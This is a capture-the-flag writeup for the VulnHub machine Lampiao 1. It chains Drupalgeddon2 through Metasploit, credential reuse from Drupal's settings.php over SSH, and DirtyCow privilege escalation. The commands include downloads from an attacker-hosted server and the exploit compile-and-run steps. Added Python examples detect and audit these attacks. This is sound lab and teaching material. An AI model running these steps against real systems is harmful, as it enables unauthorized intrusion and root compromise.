Lampiao 1 CTF Writeup — Drupalgeddon2 + DirtyCow | Th0mas_sh316y
CTF WRITEUP VULNHUB LINUX MEDIUM

Lampiao 1 — Drupalgeddon2 & DirtyCow

Written By: Th0mas_sh316y

Difficulty: Medium

Platform: VulnHub

CVEs: CVE-2018-7600 · CVE-2016-5195

Lampiao 1 Machine
Machine: Lampiao 1 · Medium · Linux · VulnHub

Lampiao 1 is a Medium-difficulty VulnHub machine with a Brazilian-outlaw theme. The target runs Drupal on a non-standard port, making thorough port scanning a mandatory first step. Exploitation begins with Drupalgeddon2 (CVE-2018-7600) for unauthenticated remote code execution, continues with credential extraction from Drupal's configuration file, and escalates to root using the DirtyCow kernel vulnerability (CVE-2016-5195) — one of the most widely known Linux kernel exploits ever published.

01_Reconnaissance

The initial scan targets three specific ports: 22 (SSH), 80 (HTTP), and 1898 (non-standard HTTP), with -sV for version detection and -sC for the default script set. Port 1898 is the critical finding — it hosts a Drupal CMS installation that a default-port scan alone would not reveal.

terminal / nmap
$ sudo nmap -p22,80,1898 <TARGET_IP> -sV -sC -A

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1
80/tcp   open  http    Apache httpd 2.4.7
1898/tcp open  http    Apache httpd 2.4.7 (Drupal CMS)

Recon Tip — Non-Standard Ports

Always run a full port scan (nmap -p-) or at minimum target common alternative HTTP ports (8080, 8443, 1898, 10000, etc.) before assuming a host has limited exposure. Critical services are often hidden on non-standard ports intentionally.

Navigating to http://<TARGET_IP>:1898 confirms a running Drupal installation. The CHANGELOG.txt file at the root of the Drupal directory is accessible and reveals the exact version number — confirming vulnerability to CVE-2018-7600 (Drupalgeddon2).

02_Exploitation — Drupalgeddon2 (CVE-2018-7600)

Drupalgeddon2 is an unauthenticated remote code execution vulnerability in Drupal's Form API. The flaw exists because Drupal does not properly sanitize the #access_callback property before processing form submissions, allowing an attacker to execute arbitrary PHP code without any authentication. Metasploit ships a reliable module for this.

terminal / metasploit
$ msfconsole -q
msf6 > search drupal

   Name                                     Rank
   ----                                     ----
   exploit/unix/webapp/drupal_drupalgeddon2  excellent

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(...) > set RHOSTS <TARGET_IP>
msf6 exploit(...) > set RPORT 1898
msf6 exploit(...) > set LHOST <ATTACKER_IP>
msf6 exploit(...) > run

[*] Meterpreter session 1 opened — www-data shell established

The exploit delivers a Meterpreter session as www-data. Dropping into a system shell gives us command execution on the target. The web server user has read access to all Drupal configuration files — which is where the credential chain begins.
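From the defender's side, the useful consequence of the flaw described above is that Drupal accepted '#'-prefixed render-array keys inside ordinary form input, and the vendor fix strips such keys from request data. A browser never submits keys like that, so their presence in a query string or POST body is a high-signal indicator regardless of which property is abused. The following is an added example written for this writeup, not the author's code and not part of Drupal or Metasploit. The log format (an access-log line with an optional `body=<urlencoded POST body>` field appended by a hypothetical logging setup), every sample line, and the `#demo_property` key are constructed; `render_array_keys`, `inspect_line` and `scan` are helper names chosen here.

```python
"""Flag web-log requests that submit Drupal render-array properties.

Added example, not from the original writeup. All log lines below are
constructed; the '#'-bearing parameter name is deliberately a made-up one.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Request line, status, size, then the hypothetical 'body=' field.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
    r'(?: body=(?P<body>\S*))?'
)

# Constructed sample lines (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /user/register HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "POST /user/register?_wrapper_format=drupal_ajax HTTP/1.1" 200 812 body=form_id=user_register_form&account%5B%23demo_property%5D=1',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?q=node/1&page=%23top HTTP/1.1" 200 3000',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "POST /node/add HTTP/1.1" 302 0 body=title=Hello%23World&body=text',
]


def key_segments(name):
    """Split a PHP-style array name 'account[mail][#prop]' into its segments."""
    head = name.split('[', 1)[0]
    return [head] + re.findall(r'\[([^\]]*)\]', name)


def render_array_keys(params):
    """Return parameter names in which any segment starts with '#'.

    Only names are inspected: a '#' inside a *value* (e.g. an anchor) is
    normal and must not trigger.
    """
    return [k for k, _ in params
            if any(seg.startswith('#') for seg in key_segments(k))]


def request_params(target, body):
    """Decode query-string and POST-body parameters into (name, value) pairs.

    parse_qsl percent-decodes names, so 'account%5B%23x%5D' becomes 'account[#x]'.
    """
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if body:
        params += parse_qsl(body, keep_blank_values=True)
    return params


def inspect_line(line):
    """Parse one log line; None if it is not an access-log request line."""
    m = LOG_RE.search(line)
    if not m:
        return None
    keys = render_array_keys(request_params(m['target'], m['body']))
    return {'method': m['method'],
            'path': urlsplit(m['target']).path,
            'suspicious_keys': keys}


def scan(lines):
    """Return the inspection records of every line carrying a suspicious key."""
    results = []
    for line in lines:
        rec = inspect_line(line)
        if rec and rec['suspicious_keys']:
            results.append(rec)
    return results


if __name__ == '__main__':
    for rec in scan(SAMPLE_LOGS):
        print(rec)
```

Keying on '#' in parameter names rather than on `_wrapper_format=drupal_ajax` matters: the latter appears in perfectly legitimate AJAX form traffic, whereas the third and fourth sample lines show that '#' characters in values (anchors, free text) are left alone. On a real host the same logic runs over the Apache access log once the POST body is being logged.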

03_Credential_Extraction — settings.php

Drupal stores its database configuration in sites/default/settings.php. This file contains the database username and password in plaintext. On poorly administered machines, developers reuse these credentials as system-account passwords — a misconfiguration that frequently enables lateral movement.

terminal / settings.php
$ cat /var/www/html/sites/default/settings.php

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'tiago',
      'password' => '[REDACTED]',
      'host'     => 'localhost',
    ),
  ),
);

Key Finding — Credential Reuse

The database password for user tiago has been reused as the SSH login credential. This is a textbook credential reuse vulnerability. In real engagements, always test every recovered credential against every available service — SSH, FTP, RDP, web panels, and database interfaces.

04_Lateral_Movement — SSH as tiago

The credential recovered from settings.php is tested against the SSH service on port 22. The login succeeds, giving us a proper interactive TTY as tiago. This is significantly more stable than the Meterpreter session and provides a cleaner environment for post-exploitation.

terminal / ssh
$ ssh tiago@<TARGET_IP>
Password: [REDACTED]

tiago@lampiao:~$ id
uid=1000(tiago) gid=1000(tiago) groups=1000(tiago)

tiago@lampiao:~$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP

The kernel version revealed by uname -a is immediately noteworthy — Linux kernel 4.4.0-31 is within the vulnerable range for DirtyCow. To confirm this without guessing, the Linux Exploit Suggester script is used.

05_Kernel_Enumeration — Linux Exploit Suggester

The Linux Exploit Suggester script automates kernel version analysis and cross-references it against a database of known exploits. It is one of the fastest ways to identify applicable privilege escalation vectors on a Linux host.

terminal / exploit suggester
# On attacker machine — host the script
$ python3 -m http.server 80

# On target machine — download and run
tiago@lampiao:~$ wget http://<ATTACKER_IP>/linux-exploit-suggester.sh
tiago@lampiao:~$ chmod +x linux-exploit-suggester.sh
tiago@lampiao:~$ ./linux-exploit-suggester.sh

[+] [CVE-2016-5195] dirtycow 2
    Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
    Exposure: highly probable
    Tags: ubuntu=14.04|16.04 (kernel:4.4.0-*)
    Download URL: https://www.exploit-db.com/download/40847

CVE-2016-5195 — DirtyCow Explained

DirtyCow is a race condition in the Linux kernel's memory subsystem. The kernel's copy-on-write (COW) mechanism can be abused to gain write access to read-only memory mappings, allowing a low-privileged user to overwrite privileged files — most commonly used to modify /etc/passwd and insert a new root user. The vulnerability affects Linux kernels from version 2.6.22 up to 4.8.3.
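The kernel-version reasoning from the uname output above can be turned into a fleet-wide inventory check. The following is an added example written for this writeup, not the author's tooling and not Linux Exploit Suggester. It encodes the affected range the writeup gives (2.6.22 onward) and the upstream fix it names (4.8.3), and goes one step further by adding the commonly cited stable-branch fix releases for the 4.4 and 4.7 series (4.4.26 and 4.7.9) so that a 4.4.x host is not flagged forever. The hostnames and all release strings except the one from the writeup's `uname -a` output are constructed; `classify`, `triage` and `release_from_uname` are helper names chosen here. The caveat a practitioner must keep in mind is that distributions backport kernel fixes without changing the upstream version, so an "in affected range" result means "check the distro package changelog", not "confirmed exploitable".

```python
"""Classify kernel release strings against the DirtyCow (CVE-2016-5195) fix.

Added example, not from the original writeup. Version comparison only; it
cannot see distribution backports (see the caveat in the lead-in).
"""
import re

FIRST_AFFECTED = (2, 6, 22)
# Fix release per stable series (commonly cited); other series fall back to
# the 4.8.3 mainline fix named in the writeup.
SERIES_FIX = {(4, 4): (4, 4, 26), (4, 7): (4, 7, 9)}
MAINLINE_FIX = (4, 8, 3)

# Constructed inventory: {hostname: output of 'uname -a'}. Only the lampiao
# line is taken from the writeup; the other two are made up.
SAMPLE_INVENTORY = {
    'lampiao': 'Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP',
    'web-01': 'Linux web-01 4.9.0-8-amd64 #1 SMP Debian',
    'legacy-db': 'Linux legacy-db 2.6.18-398.el5 #1 SMP',
}


def parse_release(release):
    """'4.4.0-31-generic' -> (4, 4, 0); '-31-generic' is the distro build tag."""
    m = re.match(r'\s*(\d+)\.(\d+)(?:\.(\d+))?', release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(g or 0) for g in m.groups())


def release_from_uname(uname_a):
    """Pull the release field (third token) out of a full 'uname -a' line."""
    fields = uname_a.split()
    if len(fields) < 3:
        raise ValueError("not a uname -a line")
    return fields[2]


def fix_version_for(version):
    """Fix release that applies to this version's stable series."""
    return SERIES_FIX.get(version[:2], MAINLINE_FIX)


def classify(release):
    """Return 'not affected', 'fixed upstream' or 'in affected range'."""
    v = parse_release(release)
    if v < FIRST_AFFECTED:
        return 'not affected'
    if v >= fix_version_for(v):
        return 'fixed upstream'
    return 'in affected range'


def in_dirtycow_range(release):
    return classify(release) == 'in affected range'


def triage(inventory):
    """Hosts whose upstream version is in range and need a backport check."""
    return sorted(host for host, line in inventory.items()
                  if in_dirtycow_range(release_from_uname(line)))


if __name__ == '__main__':
    for host, line in SAMPLE_INVENTORY.items():
        rel = release_from_uname(line)
        print(f"{host:10} {rel:24} {classify(rel)}")
    print("needs backport check:", triage(SAMPLE_INVENTORY))
```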

06_PrivEsc — DirtyCow (CVE-2016-5195)

The DirtyCow variant from Exploit-DB (40847) creates a new root-level user by modifying /etc/passwd via the race condition. The exploit requires a C++ compiler with thread support. The resulting binary is run directly on the target, after which the new root password is used to switch accounts.

terminal / dirtycow compilation & execution
# Download the exploit source to the target
tiago@lampiao:~$ wget https://www.exploit-db.com/download/40847 -O 40847.cpp

# Compile with g++ (C++11, threaded)
tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirtycow2 40847.cpp -lutil

# Execute the exploit
tiago@lampiao:~$ ./dirtycow2

/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: [REDACTED]
Complete line:
firefart:[REDACTED HASH]:0:0:pwned:/root:/bin/bash

mmap: 7f...
madvise 0
procselfmem 73626

Done! Check /etc/passwd to see if the new user was created.

# Switch to the newly created root account
tiago@lampiao:~$ su root
Password: [REDACTED]

root@lampiao:~# whoami
root

root@lampiao:~# cat /root/flag.txt

Post-Exploitation Note — Cleanup

DirtyCow directly modifies /etc/passwd on disk. In a real engagement, always restore the original file from the backup created at /tmp/passwd.bak before ending the assessment. Leaving a modified /etc/passwd on a production system constitutes unauthorized persistent access.
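The cleanup point above also defines what a responder should look for on a host where this technique is suspected. The following is an added example written for this writeup, not the author's code and not part of any distribution. The checks follow directly from the "Complete line" printed by the exploit above: a second UID 0 account, a password hash sitting in the passwd field instead of /etc/shadow, and entries that differ from the backup written to /tmp/passwd.bak. Both file contents below are constructed stand-ins, the hash is a placeholder, and `parse_passwd` and `audit` are helper names chosen here.

```python
"""Audit a passwd file for the traces a DirtyCow-style overwrite leaves behind.

Added example, not from the original writeup. Run it on a host as
  python3 passwd_audit.py /etc/passwd /tmp/passwd.bak
or with no arguments to audit the constructed sample below.
"""
import sys

FIELDS = ('name', 'passwd', 'uid', 'gid', 'gecos', 'home', 'shell')

# Constructed stand-in for /tmp/passwd.bak (the pre-exploit file).
BACKUP_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tiago:x:1000:1000:tiago,,,:/home/tiago:/bin/bash
"""

# Constructed stand-in for the post-exploit /etc/passwd: a new UID 0 account
# whose (placeholder) hash sits directly in the passwd field.
CURRENT_PASSWD = BACKUP_PASSWD + (
    "firefart:$6$CONSTRUCTED$placeholderhash:0:0:pwned:/root:/bin/bash\n"
)


def parse_passwd(text):
    """Return (entries, problems); each entry is a dict keyed by FIELDS."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(':')
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            problems.append(f"line {lineno}: malformed entry {line!r}")
            continue
        entry = dict(zip(FIELDS, parts))
        entry['uid'] = int(entry['uid'])
        entry['gid'] = int(entry['gid'])
        entries.append(entry)
    return entries, problems


def audit(current_text, backup_text=None):
    """Return human-readable findings; an empty list means nothing was found."""
    current, findings = parse_passwd(current_text)  # parse problems count too
    for e in current:
        # Any UID 0 account other than root is the classic DirtyCow artefact.
        if e['uid'] == 0 and e['name'] != 'root':
            findings.append(f"extra UID 0 account: {e['name']}")
        # Shadowed systems keep 'x' (or a lock marker) here; a real hash or an
        # empty field means the password lives in world-readable /etc/passwd.
        if e['passwd'] not in ('x', '*', '!', '!!'):
            findings.append(f"password field for {e['name']} is not shadowed "
                            f"(hash or empty password stored in passwd)")
    if backup_text is not None:
        backup, backup_problems = parse_passwd(backup_text)
        findings.extend(f"backup {p}" for p in backup_problems)
        before = {e['name']: e for e in backup}
        after = {e['name']: e for e in current}
        for name, e in after.items():
            if name not in before:
                findings.append(f"account added since backup: {name}")
            elif before[name] != e:
                findings.append(f"account changed since backup: {name}")
        for name in before:
            if name not in after:
                findings.append(f"account removed since backup: {name}")
    return findings


if __name__ == '__main__':
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as cur, open(sys.argv[2]) as bak:
            results = audit(cur.read(), bak.read())
    else:
        results = audit(CURRENT_PASSWD, BACKUP_PASSWD)
    print("\n".join(results) or "clean")
```

The comparison against the backup is what catches the variant in which the root line itself is overwritten rather than a line appended: the diff then reports root as removed and the new account as added, while the UID 0 and shadowing checks still fire on their own when no backup is available.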

07_Attack_Chain_Summary

  1. Nmap scan → ports 22 (SSH), 80 (HTTP), 1898 (Drupal)
  2. Port 1898 → Drupal CMS → CHANGELOG.txt confirms vulnerable version
  3. Metasploit drupal_drupalgeddon2 (CVE-2018-7600) → Meterpreter as www-data
  4. /var/www/html/sites/default/settings.php → tiago's credentials extracted
  5. SSH as tiago → credential reuse confirmed → stable shell
  6. linux-exploit-suggester.sh → CVE-2016-5195 (DirtyCow) — highly probable
  7. Exploit-DB 40847 → g++ compile → ./dirtycow2 → /etc/passwd modified
  8. su root → password [REDACTED] → ROOT achieved